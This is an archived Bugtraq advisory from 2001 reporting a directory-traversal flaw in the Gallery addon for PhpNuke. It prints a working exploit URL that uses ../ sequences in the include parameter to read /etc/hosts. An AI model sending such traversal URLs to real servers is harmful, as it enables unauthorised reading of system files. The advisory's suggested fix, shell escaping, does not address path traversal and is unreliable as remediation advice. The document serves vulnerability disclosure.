Bugtraq mailing list archives
Gallery Addon for PhpNuke remote file viewing vulnerability
From: Cabezon Aurélien <aurelien.cabezon () isecurelabs com>
Date: Sun, 18 Nov 2001 03:18:26 +0100
Gallery Addon for PhpNuke remote file viewing vulnerability Problem discovered: 18/10/2001 by Cabezon Aurélien | aurelien.cabezon () iSecureLabs com [1] Description Gallery is an intuitive web based photo gallery with authenticated users and privileged albums. Photo management includes automatic thumbnails, resizing, rotation, etc. Gallery is available as a Nuke 5.0 module. Gallery Addon is vulnerable to the ../.. bug that allow remote file reading on the web server as whatever user runs the web server. [2] Exploit http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload& name=gallery&file=index&inclu de=../../../../../../etc/hosts [3] Fix Coder has been alerted. An easy way to fix such a vulnerability is to use the PHP included "system escapeshell" function. [4] Informations bout Gallery Addon for PhpNuke http://www.menalto.com/projects/gallery-nuke/ Author: bharat () menalto com --- Cabezon Aurélien http://www.iSecureLabs.com aurelien.cabezon@iSecureLabs.
Current thread:
- Gallery Addon for PhpNuke remote file viewing vulnerability Cabezon Aurélien (Nov 19)